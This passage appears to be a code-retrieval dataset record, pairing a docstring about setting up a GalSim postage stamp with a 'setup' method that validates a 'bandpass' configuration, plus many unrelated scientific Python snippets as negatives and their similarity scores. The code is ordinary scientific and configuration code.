the arrays!\n self.V.tau = np.squeeze(old_tau[valid_index[0]])\n if np.array(self.V.omega).size != 1:\n self.V.omega = np.squeeze(old_omega[valid_index[0]])\n if np.array(self.SRF.NormBRDF).size != 1:\n self.SRF.NormBRDF = np.squeeze(old_NN[valid_index[0]])\n\n # calculate volume and interaction term where tau-values are valid\n _Ivol = self.volume()\n if self.int_Q is True:\n _Iint = self.interaction()\n else:\n _Iint = np.full_like(self.t_0, 0.)\n\n # reset parameter values to old values\n self.t_0 = old_t_0\n self.p_0 = old_p_0\n self.t_ex = old_t_ex\n self.p_ex = old_p_ex\n\n # squeezing the arrays is necessary since the setter-function for\n # tau, omega and NormBRDF automatically add an axis to the arrays!\n self.V.tau = np.squeeze(old_tau)\n self.V.omega = np.squeeze(old_omega)\n self.SRF.NormBRDF = np.squeeze(old_NN)\n\n # combine calculated volume-contributions for valid tau-values\n # with zero-arrays for invalid tau-values\n Ivol = np.ones_like(self.t_0)\n Ivol[valid_index[0]] = _Ivol\n Ivol[inval_index[0]] = np.ones_like(Ivol[inval_index[0]]) * 0.\n\n # combine calculated interaction-contributions for valid tau-values\n # with zero-arrays for invalid tau-values\n if self.int_Q is True:\n Iint = np.ones_like(self.t_0)\n Iint[valid_index[0]] = _Iint\n Iint[inval_index[0]] = np.ones_like(Iint[inval_index[0]]) * 0.\n else:\n Iint = np.full_like(self.t_0, 0.)\n\n return Isurf + Ivol + Iint, Isurf, Ivol, Iint", "def get_position(self, t0):\n my_pos_x=np.random.uniform(-20, 20)\n my_pos_y=np.random.uniform(-20, 20)\n r=np.array([my_pos_x, my_pos_y])\n x_y=np.zeros(shape=(self.no_planets-1, 2))\n tol=1e-5\n diff=np.zeros(self.no_planets-1)\n for k in range(self.no_planets-1):\n r1=np.linalg.norm(r)\n 
r2=np.linalg.norm(r-self.positionFunction(t0)[:, k])\n r3=np.linalg.norm(r-self.positionFunction(t0)[:, k+1])\n x1=0\n y1=0\n x2=self.positionFunction(t0)[0,k]\n y2=self.positionFunction(t0)[1,k]\n x3=self.positionFunction(t0)[0,k+1]\n y3=self.positionFunction(t0)[1, k+1]\n x,y,difference=self.triangulate_analytic(x1,y1,r1,x2,y2,r2,x3,y3,r3)\n x_y[k, 0]=x\n x_y[k, 1]=y\n diff[k]=difference\n if (diff > tol).any():\n print diff.max()\n print \"Oh no, one failed :(\"\n sys.exit(1)\n print \"My pos x:\", my_pos_x\n print \"My pos y:\", my_pos_y\n #return x1, y1, r1, x2, y2, r2, x3, y3, r3", "def obj(k_next) : \n \n if method==1 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*linear_interp(k_grid,v_update,k_next))\n elif method==2 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*quad_interp(k_grid,v_update,k_next))\n elif method==3 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*cubic_interp(k_grid,v_update,k_next))\n \n return value_vec", "def initial_parameters(ship_data: dict) -> dict:\n\n mask = df_parameters[\"brix_lambda\"].notnull()\n df_parameters.loc[mask, \"brix_prime\"] = df_parameters.loc[mask].apply(\n calculate_prime, ship_parameters=ship_data, axis=1\n )\n\n df_parameters[\"prime\"] = df_parameters[\"brix_prime\"]\n\n df_parameters.loc[\"Ydelta\", \"prime\"] = 0.003 # Just guessing\n df_parameters.loc[\"Ndelta\", \"prime\"] = (\n -df_parameters.loc[\"Ydelta\", \"prime\"] / 2\n ) # Just guessing\n\n df_parameters.loc[\"Nu\", \"prime\"] = 0\n df_parameters.loc[\"Nur\", \"prime\"] = 0\n # df_parameters.loc[\"Xdelta\", \"prime\"] = -0.001\n df_parameters.loc[\"Xr\", \"prime\"] = 0\n df_parameters.loc[\"Xrr\", \"prime\"] = 0.000\n df_parameters.loc[\"Xu\", \"prime\"] = 0\n df_parameters.loc[\"Xuu\", \"prime\"] = 0\n df_parameters.loc[\"Xv\", \"prime\"] = 0\n df_parameters.loc[\"Xvr\", \"prime\"] = 0\n df_parameters.loc[\"Yu\", \"prime\"] = 0\n df_parameters.loc[\"Yur\", \"prime\"] = 0.00\n\n df_parameters.loc[\"Nuv\", \"prime\"] = 0.0\n df_parameters.loc[\"Xthrust\", \"prime\"] = 1.0\n df_parameters.loc[\"Yrdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Xvdelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Xdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Yvdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Nrdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Yuv\", \"prime\"] = 0.0\n df_parameters.loc[\"Nvdeltadelta\", \"prime\"] = 0.0\n\n df_parameters.loc[\"Ythrustdelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Nthrustdelta\", \"prime\"] = 0.0\n\n parameters = df_parameters[\"prime\"].dropna().to_dict()\n\n return parameters", "def initialize_adam(parameters):\n\n\tv = initialize_momentum_velocity(parameters)\n\ts = initialize_momentum_velocity(parameters)\n\n\treturn v, s", "def update(self, tfinal):\n t = 0; kk = 0\n nstep = int(np.round(tfinal/self.dt))+1 # number of time steps\n self.omega = np.zeros((nstep,self.npts))\n self.theta = np.zeros((nstep,self.npts))\n\n while t <(tfinal+1e-10):\n self.return_map()\n self.omega[kk] = self.y[0]\n self.theta[kk] = self.y[1]\n\n self.y = RK4(self.y, self.dt, t, self.deri)\n kk += 1; t += self.dt\n\n return self", "def default_initial_params(self) -> numpy.ndarray:\n\n total_time = self.adiabatic_evolution_time\n step_time = total_time / self.iterations\n hamiltonian = self.hamiltonian\n\n params = []\n for param in self.params():\n if param.letter == 'U':\n p, i = param.subscripts\n params.append(_canonicalize_exponent(\n -0.5 * self.orbital_energies[p] * step_time / numpy.pi, 
2))\n else:\n p, q, i = param.subscripts\n # Use the midpoint of the time segment\n interpolation_progress = 0.5 * (2 * i + 1) / self.iterations\n params.append(_canonicalize_exponent(\n -2 * hamiltonian.two_body[p, q] * interpolation_progress *\n step_time / numpy.pi, 2))\n\n return numpy.array(params)", "def initial_projectile_velocity(FinalPositionInX, FinalPositionInY, ReleaseAngle, ShotDepth):\n\tVelocity = sqrt((9.8/2.)*(displacement_in_x(FinalPositionInX,ReleaseAngle,ShotDepth)/cos(ReleaseAngle))**2 \\\n\t\t\t\t/ (displacement_in_x(FinalPositionInX,ReleaseAngle,ShotDepth)*tan(ReleaseAngle) \\\n\t\t\t\t\t- displacement_in_y(FinalPositionInY,ReleaseAngle)))\n\treturn(Velocity)", "def extract_initial_params(self, T1vec: np.ndarray):\n compN = len(T1vec)\n layer_guess = np.random.random(compN)\n layer_guess = layer_guess / layer_guess.sum()\n layer_guess = layer_guess.tolist()\n s0 = 5000 * np.random.rand() + 5000\n x0 = [layer_guess, s0]\n min_val = [np.zeros(compN).tolist(), 5000]\n max_val = [np.ones(compN).tolist(), 10000]\n x0 = np.asarray(x0[0])\n return x0, min_val, max_val" ]
[ "0.6120319", "0.6116722", "0.5932199", "0.5788035", "0.57826406", "0.57638705", "0.5757198", "0.5753652", "0.57429856", "0.57152313", "0.57009196", "0.5668376", "0.5657558", "0.5629421", "0.5624367", "0.5592595", "0.5591798", "0.5582761", "0.5570598", "0.55646664", "0.5564146", "0.55511785", "0.5525184", "0.55204207", "0.55135536", "0.5510296", "0.550398", "0.5463102", "0.5457339", "0.5453269", "0.5450694", "0.5449793", "0.5444014", "0.5440295", "0.54340976", "0.5427834", "0.5425505", "0.541787", "0.5406035", "0.5403882", "0.54030323", "0.53982764", "0.53975207", "0.538244", "0.53763646", "0.5355561", "0.5355561", "0.53527534", "0.53502125", "0.5349311", "0.53380305", "0.53310144", "0.5330321", "0.53298384", "0.53297746", "0.5328105", "0.5316259", "0.53026074", "0.5287349", "0.5284021", "0.5282196", "0.52797544", "0.5268016", "0.52607256", "0.52606326", "0.5253331", "0.52496785", "0.5248526", "0.52385896", "0.5238158", "0.5234131", "0.52327794", "0.52303195", "0.52253664", "0.522312", "0.52211726", "0.52205074", "0.5215534", "0.5210186", "0.5198768", "0.5196101", "0.51959735", "0.51946276", "0.51909506", "0.51887316", "0.5184827", "0.5182282", "0.5181488", "0.5181415", "0.51811194", "0.5180403", "0.5179382", "0.5178509", "0.5177551", "0.51775175", "0.5176769", "0.5172371", "0.51709783", "0.5169441", "0.51642215" ]
0.6997615
0
Do the initialization and setup for building a postage stamp.

In the base class, we check for and parse the appropriate size and position values in config (aka base['stamp'] or base['image']). Values given in base['stamp'] take precedence if these are given in both places (which would be confusing, so probably shouldn't do that, but there might be a use case where it would make sense).

Parameters:
    config      The configuration dict for the stamp field.
    base        The base configuration dict.
    xsize       The xsize of the image to build (if known).
    ysize       The ysize of the image to build (if known).
    ignore      A list of parameters that are allowed to be in config that we can ignore here,
                i.e. it won't be an error if these parameters are present.
    logger      If given, a logger object to log progress.

Returns:
    xsize, ysize, image_pos, world_pos
def setup(self, config, base, xsize, ysize, ignore, logger):
    # .. Do any custom setup you need to do.
    # Probably want to call the base class setup function to do the normal determination
    # of the size and position values.

    # Extra processing of 'bandpass' argument
    # Most needed type-checking is done in galsim.bandpass
    self._req_bp_fields = ['throughput', 'wave_type']
    self._opt_bp_fields = ['red_limit', 'blue_limit', 'zeropoint']

    try:
        bp = config['bandpass']
        for req in self._req_bp_fields:
            if req not in bp.keys():
                raise ValueError('Must pass field {} for a bandpass object!'.format(req))
        # for opt in self._opt_bp_fields:
        #     if opt not in bp.keys():
        #         config['bandpass'][opt] = None
        for key in bp.keys():
            if key not in (self._req_bp_fields+self._opt_bp_fields):
                raise ValueError('Field {} is not a valid entry for a bandpass!'.format(key))
    except KeyError:
        raise KeyError('`bandpass` is a required field for a COSMOSChromatic stamp!')

    extra_ignore = ignore + ['bandpass']
    return super(self.__class__, self).setup(config, base, xsize, ysize, extra_ignore, logger)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setup(self, config, base, file_num, logger):\n # This is a copy of the base class code\n seed = galsim.config.SetupConfigRNG(base, logger=logger)\n logger.debug('file %d: seed = %d',file_num,seed)\n\n if 'det_num' not in config:\n config['det_num'] = { 'type': 'Sequence', 'nitems': 189 }\n\n # Figure out the detector name for the file name.\n detnum = galsim.config.ParseValue(config, 'det_num', base, int)[0]\n if 'camera' in config:\n camera_name = galsim.config.ParseValue(config, 'camera', base, str)[0]\n else:\n camera_name = 'LsstCam'\n camera = get_camera(camera_name)\n if 'only_dets' in config:\n only_dets = config['only_dets']\n det_name = only_dets[detnum]\n else:\n det_name = camera[detnum].getName()\n base['det_name'] = det_name\n if 'eval_variables' not in base:\n base['eval_variables'] = {}\n base['eval_variables']['sdet_name'] = det_name\n\n # Get detector size in pixels.\n det_bbox = camera[det_name].getBBox()\n base['xsize'] = det_bbox.width\n base['ysize'] = det_bbox.height\n\n if 'exptime' in config:\n base['exptime'] = galsim.config.ParseValue(\n config, 'exptime', base, float\n )[0]\n else:\n base['exptime'] = 30.0", "def __init__(self,\r\n default_path = None,\r\n default_level = None,\r\n logging_dir = None,\r\n log_file = None,\r\n log_file_dir = None,\r\n log_conf_full = None\r\n ):\r\n self.logger_is_set = False\r\n\r\n '''\r\n Get ready to setup everything.\r\n TO DO: read from structure is badly needed. \r\n '''\r\n self.default_path = default_path\r\n self.default_level = default_level\r\n self.logging_dir = logging_dir\r\n self.log_file = log_file\r\n self.log_file_dir = log_file_dir\r\n self.log_conf_full = log_conf_full\r\n\r\n\r\n\r\n self.setup_logging(self.default_path,\r\n self.default_level,\r\n self.logging_dir,\r\n self.log_file,\r\n self.log_file_dir,\r\n self.log_conf_full\r\n )", "def __init__(self, grape_config):\n super()\n self.grape_config = grape_config\n # inherit file name and data path from grape config\n self.file_name = grape_config[\"file_name\"]\n self.data_path = grape_config[\"data_path\"]\n log_file = \"{}.out\".format(self.file_name)\n self.log_path = os.path.join(self.data_path, log_file)", "def __init__(self):\n self.config = configs.Configuration()\n self.log = logger.CustomLogger(__name__).get_logger()\n self.output_dir = self.config.getConfigValue('OUTPUT_DIR')\n self.s3_directory = self.config.getConfigValue('S3_FILE_PATH_TRANSFORM')", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(gps_dvl_ins_stamped, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.sample_count is None:\n self.sample_count = 0\n if self.ekf_roll is None:\n self.ekf_roll = 0.\n if self.ekf_pitch is None:\n self.ekf_pitch = 0.\n if self.ekf_yaw is None:\n self.ekf_yaw = 0.\n if self.ekf_lat is None:\n self.ekf_lat = 0.\n if self.ekf_lon is None:\n self.ekf_lon = 0.\n if self.ekf_alt is None:\n self.ekf_alt = 0.\n if self.ekf_vN is None:\n self.ekf_vN = 0.\n if self.ekf_vE is None:\n self.ekf_vE = 0.\n if self.ekf_vD is None:\n self.ekf_vD = 0.\n if self.ekf_vX is None:\n self.ekf_vX = 0.\n if self.ekf_vY is None:\n self.ekf_vY = 0.\n if self.ekf_vZ is None:\n self.ekf_vZ = 0.\n if self.rad_gyro_X is None:\n self.rad_gyro_X = 0.\n if self.rad_gyro_Y is None:\n self.rad_gyro_Y = 0.\n if self.rad_gyro_Z is None:\n self.rad_gyro_Z = 0.\n if self.angular_acc_X is None:\n self.angular_acc_X = 0.\n if 
self.angular_acc_Y is None:\n self.angular_acc_Y = 0.\n if self.angular_acc_Z is None:\n self.angular_acc_Z = 0.\n if self.alt_DVL is None:\n self.alt_DVL = 0\n if self.dvl_error_code is None:\n self.dvl_error_code = b''\n if self.flag_to_check is None:\n self.flag_to_check = 0\n if self.imu_deg_gyro_X is None:\n self.imu_deg_gyro_X = 0.\n if self.imu_deg_gyro_Y is None:\n self.imu_deg_gyro_Y = 0.\n if self.imu_deg_gyro_Z is None:\n self.imu_deg_gyro_Z = 0.\n if self.imu_mag_X is None:\n self.imu_mag_X = 0.\n if self.imu_mag_Y is None:\n self.imu_mag_Y = 0.\n if self.imu_mag_Z is None:\n self.imu_mag_Z = 0.\n if self.imu_acc_X is None:\n self.imu_acc_X = 0.\n if self.imu_acc_Y is None:\n self.imu_acc_Y = 0.\n if self.imu_acc_Z is None:\n self.imu_acc_Z = 0.\n if self.gps_lat is None:\n self.gps_lat = 0\n if self.gps_lon is None:\n self.gps_lon = 0\n if self.gps_alt is None:\n self.gps_alt = 0.\n if self.gps_vN is None:\n self.gps_vN = 0.\n if self.gps_vE is None:\n self.gps_vE = 0.\n if self.gps_vD is None:\n self.gps_vD = 0.\n if self.dvl_vX is None:\n self.dvl_vX = 0.\n if self.dvl_vY is None:\n self.dvl_vY = 0.\n if self.dvl_vZ is None:\n self.dvl_vZ = 0.\n else:\n self.header = std_msgs.msg.Header()\n self.sample_count = 0\n self.ekf_roll = 0.\n self.ekf_pitch = 0.\n self.ekf_yaw = 0.\n self.ekf_lat = 0.\n self.ekf_lon = 0.\n self.ekf_alt = 0.\n self.ekf_vN = 0.\n self.ekf_vE = 0.\n self.ekf_vD = 0.\n self.ekf_vX = 0.\n self.ekf_vY = 0.\n self.ekf_vZ = 0.\n self.rad_gyro_X = 0.\n self.rad_gyro_Y = 0.\n self.rad_gyro_Z = 0.\n self.angular_acc_X = 0.\n self.angular_acc_Y = 0.\n self.angular_acc_Z = 0.\n self.alt_DVL = 0\n self.dvl_error_code = b''\n self.flag_to_check = 0\n self.imu_deg_gyro_X = 0.\n self.imu_deg_gyro_Y = 0.\n self.imu_deg_gyro_Z = 0.\n self.imu_mag_X = 0.\n self.imu_mag_Y = 0.\n self.imu_mag_Z = 0.\n self.imu_acc_X = 0.\n self.imu_acc_Y = 0.\n self.imu_acc_Z = 0.\n self.gps_lat = 0\n self.gps_lon = 0\n self.gps_alt = 0.\n self.gps_vN = 0.\n self.gps_vE = 0.\n self.gps_vD = 0.\n self.dvl_vX = 0.\n self.dvl_vY = 0.\n self.dvl_vZ = 0.", "def __init__(self, images=[], logfile='inspect_raw.info', load_log=True, \n master=None):\n if len(images) == 0:\n print('No images specified')\n return False\n \n if not os.path.exists(images[0]):\n print('First image not found (%s), is path correct?' 
%(images[0]))\n return False\n \n ##### Add .fits to filename and make backup if necessary\n self.logfile = logfile\n if not self.logfile.lower().endswith('.fits'):\n self.logfile += '.fits'\n \n if os.path.exists(self.logfile):\n bk = glob.glob(self.logfile+'.backup*')\n if len(bk) > 0:\n bkup_file = self.logfile + '.backup.%03d' %(len(bk))\n else:\n bkup_file = self.logfile + '.backup'\n \n shutil.copy(self.logfile, bkup_file)\n print('Made copy of %s -> %s' %(self.logfile, bkup_file))\n \n ####### Initialize parameters\n self.params = {} \n self.images = images\n \n self.marked_reads = None\n self.NREAD = 14\n \n ### Polygons for reads\n x0 = y0 = 12\n px = py = 6\n dx = dy = 241\n xi = np.array([0,1,1,0])\n yi = np.array([0,0,1,1])\n \n c = 0\n self.read_polygons = []\n for j in range(4):\n for i in range(4):\n c += 1\n if c > self.NREAD:\n break\n else:\n polyx = x0+i*(px+dx)+xi*dx\n polyy = y0+j*(py+dy)+yi*dy\n poly = np.array([polyx, polyy]).T\n self.read_polygons.append(mplPath.Path(poly))\n \n if os.path.exists(self.logfile) & load_log:\n self.read_fits()\n \n self.N = len(self.images)\n\n for key in ['satellite', 'earth', 'other', 'kill', 'seen']:\n if key not in self.params.keys():\n self.params[key] = np.zeros(self.N, dtype=np.int)\n \n if self.marked_reads is None:\n self.marked_reads = np.zeros((self.N, self.NREAD), dtype=int)\n \n if 'comment' not in self.params.keys():\n self.params['comment'] = ['---' for i in range(self.N)]\n \n self.i = 0\n self.master = master\n self.setup_gui()", "def __init__(self, config, logger):\n self.config = config\n self.logger = logger", "def _configure_logger(self):\n\n # NOTE not thread safe. Multiple BaseScripts cannot be instantiated concurrently.\n level = getattr(logging, self.args.log_level.upper())\n\n if self._GLOBAL_LOG_CONFIGURED:\n return\n\n # TODO different processors for different basescripts ?\n # TODO dynamically inject processors ?\n\n # since the hooks need to run through structlog, need to wrap them like processors\n def wrap_hook(fn):\n @wraps(fn)\n def processor(logger, method_name, event_dict):\n fn(event_dict)\n return event_dict\n\n return processor\n\n processors = self.define_log_processors()\n processors.extend(\n [ wrap_hook(h) for h in self.define_log_pre_format_hooks() ]\n )\n\n log_renderer = self.define_log_renderer()\n stderr_required = (not self.args.quiet)\n pretty_to_stderr = (\n stderr_required\n and (\n self.args.log_format == \"pretty\"\n or (self.args.log_format is None and sys.stderr.isatty())\n )\n )\n\n should_inject_pretty_renderer = (\n pretty_to_stderr\n and not isinstance(log_renderer, structlog.dev.ConsoleRenderer)\n )\n if should_inject_pretty_renderer:\n stderr_required = False\n processors.append(StderrConsoleRenderer())\n\n processors.append(log_renderer)\n processors.extend(\n [ wrap_hook(h) for h in self.define_log_post_format_hooks() ]\n )\n\n streams = []\n # we need to use a stream if we are writing to both file and stderr, and both are json\n if stderr_required:\n streams.append(sys.stderr)\n\n if self.args.log_file is not None:\n # TODO handle creating a directory for this log file ?\n # TODO set mode and encoding appropriately\n streams.append(open(self.args.log_file, 'a'))\n\n assert len(streams) != 0, \"cannot configure logger for 0 streams\"\n\n stream = streams[0] if len(streams) == 1 else Stream(*streams)\n atexit.register(stream.close)\n\n # a global level struct log config unless otherwise specified.\n structlog.configure(\n processors=processors,\n context_class=dict,\n 
logger_factory=LevelLoggerFactory(stream, level=level),\n wrapper_class=BoundLevelLogger,\n cache_logger_on_first_use=True,\n )\n\n # TODO take care of removing other handlers\n stdlib_root_log = logging.getLogger()\n stdlib_root_log.addHandler(StdlibStructlogHandler())\n stdlib_root_log.setLevel(level)\n\n self._GLOBAL_LOG_CONFIGURED = True", "def __init__(self, config):\n\n self.locations_hltv_starting_ = config[sC.BUCKET_LOCATIONS][sC.HLTV_STARTING]\n self.score_starting_ = config[sC.BUCKET_LOCATIONS][sC.SCORE_STARTING]\n self.logs_starting_ = config[sC.BUCKET_LOCATIONS][sC.LOGS_STARTING]\n self.temp = config[sC.FOLDER_LOCATIONS][sC.TEMP_APP_ENGINE_FOLDER]\n self.results_ = config[sC.FOLDER_LOCATIONS][sC.CONFIGS_RESULTS]\n self.amxmodx_logs_ = config[sC.FOLDER_LOCATIONS][sC.ADDONS_AMXMODX_LOGS]\n self.cstrike_logs_ = config[sC.FOLDER_LOCATIONS][sC.CSTRIKE_LOGS]\n self.hltv_demos_func_url = config[sC.CLOUD_FUNCTIONS_URLS][sC.HLTV_DEMOS_FUNC]\n self.ftp_logs_func_url = config[sC.CLOUD_FUNCTIONS_URLS][sC.FTP_LOGS_FUNC]\n\n print('{} - Initialized'.format(__name__))", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(GraspConfig, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n else:\n self.position = geometry_msgs.msg.Point()\n self.approach = geometry_msgs.msg.Vector3()\n self.binormal = geometry_msgs.msg.Vector3()\n self.axis = geometry_msgs.msg.Vector3()\n self.width = std_msgs.msg.Float32()\n self.score = std_msgs.msg.Float32()\n self.sample = geometry_msgs.msg.Point()", "def __init__(self, config):\n logging.info(\"Creating footprint\")\n # self.infra = yaml.load(config)\n self.infra = config\n self.footprint_name = self.infra.get(\"footprint\", \"ehw\")\n self.images = self.infra.get(\"images\")\n self.old_images = self.infra.get(\"old_images\", [])\n self.container_name = \"%s-metadata\" % self.footprint_name\n \n self.admin_password = self.infra.get('admin-password')\n self.savefile = self.infra.get(\"footprint\", \"outfile\") + \"-save.yaml\"\n if os.path.exists(self.savefile):\n self.saved_images = yaml.load(open(self.savefile))\n self.footprint_status=self.infra.get(\"footprint_status\", None)\n logging.debug(\"Loaded saved images: %s\" % self.saved_images)\n # sys.exit(0) ", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(LineTrackerGoalTimed, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.x is None:\n self.x = 0.\n if self.y is None:\n self.y = 0.\n if self.z is None:\n self.z = 0.\n if self.yaw is None:\n self.yaw = 0.\n if self.v_des is None:\n self.v_des = 0.\n if self.a_des is None:\n self.a_des = 0.\n if self.t_start is None:\n self.t_start = genpy.Time()\n if self.duration is None:\n self.duration = genpy.Duration()\n if self.relative is None:\n self.relative = False\n else:\n self.x = 0.\n self.y = 0.\n self.z = 0.\n self.yaw = 0.\n self.v_des = 0.\n self.a_des = 0.\n self.t_start = genpy.Time()\n self.duration = genpy.Duration()\n self.relative = 
False", "def __init__ (self, config, logger):\n self.logger = logger\n self.logger.add('loading AREA')\n config['data_type'] = np.float32\n self.area = AreaGrid(config,logger = self.logger)\n self.area.config['dataset_name'] = 'Area Data'\n self.area.config['description'] = \\\n \"\"\"Area Data contains fractional cohort data for each year the ATM\n was run. \n \"\"\"\n self.logger.add('performing post AREA setup')\n self.shape = self.area.config['grid_shape']\n self.aoi = self.area.area_of_interest()\n config['shape'] = self.shape\n config['grid_shape'] = self.area.config['grid_shape']\n config['AOI mask'] = self.aoi\n config['cohort list'] = self.area.get_cohort_list()\n self.logger.add('loading ALD')\n self.ald = ALDGrid(config,logger = self.logger)\n self.ald.config['dataset_name'] = 'ALD Data'\n self.ald.config['description'] = \\\n \"\"\"ALD Data contains ALD, and Protective Layer data for each year \n the ATM was run.\n \"\"\"\n self.logger.add('loading POI')\n self.poi = POIGrid(config,logger = self.logger)\n self.poi.config['dataset_name'] = 'POI Data'\n self.poi.config['description'] = \\\n \"\"\"POI Data contains Poi data for each year the ATM was run. \n \"\"\"\n self.logger.add('loading ICE')\n self.ice = IceGrid(config,logger = self.logger)\n self.ice.config['dataset_name'] = 'Ice Data'\n self.ice.config['description'] = \\\n \"\"\"\n Ice Data contains the ice content grid for the ATM model run\n \"\"\"\n self.logger.add('loading LAKE POND')\n self.lake_pond = LakePondGrid(config,logger = self.logger)\n self.lake_pond.config['dataset_name'] = 'Lake Pond Data'\n self.lake_pond.config['description'] = \\\n \"\"\"Lake-Pond Data contains Lake and Pond depth and count data for \n each year the ATM was run. \n \"\"\"\n self.logger.add('loading CLIMATE EVENT')\n self.climate_event = ClimateEventGrid(config,logger = self.logger)\n self.climate_event.config['dataset_name'] = 'Climate Event Data'\n self.climate_event.config['description'] = \\\n \"\"\"Climate Event Data contains climate event data for each \n year the ATM was run. \n \"\"\"\n ## TODO:redo masks here\n # for lpt in config['pond types'] + config['lake types']:\n # #~ print lpt\n # mask = self.area[lpt][0] > 0 # all cells in first ts > 0\n # self.lake_pond.apply_mask(lpt, mask)\n self.logger.add('loading DRAINGAGE')\n self.drainage = DrainageGrid(config,logger = self.logger)\n self.drainage.config['dataset_name'] = 'Drainage Data'\n self.drainage.config['description'] = \"\"\"\n Drainage contains the drainage grid for the ATM model run\n \"\"\"\n \n self.logger.add('loading DEGREE DAY')\n self.degreedays = DegreeDayGrids(\n os.path.join(\n config['Input_dir'], config['Met_Control']['FDD_file']),\n os.path.join(\n config['Input_dir'], config['Met_Control']['TDD_file'])\n )\n \n ## what does this do?\n self.ald.setup_ald_constants(\n self.degreedays.thawing[config['start year']]\n )", "def __init__(self, config):\n\n # controls for scope logging\n self.vars = None\n self.log = {}\n self.conf = config\n pe.set_default_val(self.conf, 'clip_by_norm', 0.3)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(tipCoords, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.thumb is None:\n self.thumb = [0.] * 3\n if self.index is None:\n self.index = [0.] * 3\n if self.middle is None:\n self.middle = [0.] * 3\n if self.ring is None:\n self.ring = [0.] * 3\n if self.little is None:\n self.little = [0.] * 3\n else:\n self.thumb = [0.] * 3\n self.index = [0.] 
* 3\n self.middle = [0.] * 3\n self.ring = [0.] * 3\n self.little = [0.] * 3", "def __init__(self, config_file):\n # Parse configuration file\n self.config_file = config_file\n self.config = ConfigParser.SafeConfigParser()\n self.config.read(self.config_file)\n\n self.source_do_purge = self.config.getboolean(\"source\", \"do_purge\")\n self.source_requests_dir = self.config.get(\"source\", \"requests_dir\")\n\n self.add_console_handler = self.config.getboolean(\"source\", \"add_console_handler\")\n self.add_file_handler = self.config.getboolean(\"source\", \"add_file_handler\")\n self.log_file_name = self.config.get(\"source\", \"log_file_name\")\n log_level = self.config.get(\"source\", \"log_level\")\n if log_level == 'DEBUG':\n self.log_level = logging.DEBUG\n elif log_level == 'INFO':\n self.log_level = logging.INFO\n elif log_level == 'WARNING':\n self.log_level = logging.WARNING\n elif log_level == 'ERROR':\n self.log_level = logging.ERROR\n elif log_level == 'CRITICAL':\n self.log_level = logging.CRITICAL\n\n self.author_config_file = self.config.get(\"author\", \"config_file\")\n self.author_do_purge = self.config.getboolean(\"author\", \"do_purge\")\n self.author_requests_dir = self.config.get(\"author\", \"requests_dir\")\n\n self.flickr_content_dir = self.config.get(\"flickr\", \"content_dir\")\n self.tumblr_content_dir = self.config.get(\"tumblr\", \"content_dir\")\n self.twitter_content_dir = self.config.get(\"twitter\", \"content_dir\")\n\n self.tumblr_min_total_tags = self.config.getint(\"tumblr\", \"min_total_tags\")\n self.tumblr_min_total_blogs = self.config.getint(\"tumblr\", \"min_total_blogs\")\n\n # Create a logger\n root = logging.getLogger()\n root.setLevel(self.log_level)\n formatter = logging.Formatter(\n \"%(asctime)s %(name)s %(levelname)s: %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n for handler in root.handlers:\n root.removeHandler(handler)\n if self.add_console_handler:\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter)\n root.addHandler(console_handler)\n if self.add_file_handler:\n file_handler = logging.handlers.RotatingFileHandler(\n self.log_file_name, maxBytes=1000000, backupCount=5, encoding='utf-8')\n file_handler.setFormatter(formatter)\n root.addHandler(file_handler)\n\n self.logger = logging.getLogger(u\"BluPenSource\")", "def __init__(self, config_directory, scale_override=None):\n self._config_directory = config_directory\n\n self._config_detector = DetectorConfig(config_directory)\n self._config_align = AlignConfig(config_directory, scale_override=scale_override)\n self._config_crystal = CrystalMatchConfig(config_directory)", "def __init__(self):\r\n config = ConfigProvider().getProcessingConfig()\r\n self.xGround = config.get(\"xGround\")\r\n self.yGround = config.get(\"yGround\")", "def __init__(self, config, fname, dt, preload=True): \n \n self.config = config\n self.fname = fname\n self.dt = dt\n self.xvar = config.get('profiles', 'xvar')\n self.yvar = config.get('profiles', 'yvar')\n self.zvar = config.get('profiles', 'zvar')\n self.zbounds = np.array(self.config.get('grid', 'zbounds').split(','), dtype=np.float64)\n self.pvar = config.get('profiles', 'pvar')\n self.pnvar = config.get('profiles', 'pnvar')\n self.irvar = config.get('profiles', 'irvar')\n self.psvar = config.get('profiles', 'psvar')\n self.psalqcvar = config.get('profiles', 'psalqcvar')\n self.qcvar = config.get('profiles', 'qcvar')\n self.posqcvar = config.get('profiles', 'posqcvar')\n self.datavar = config.get('profiles', 'datavar')\n 
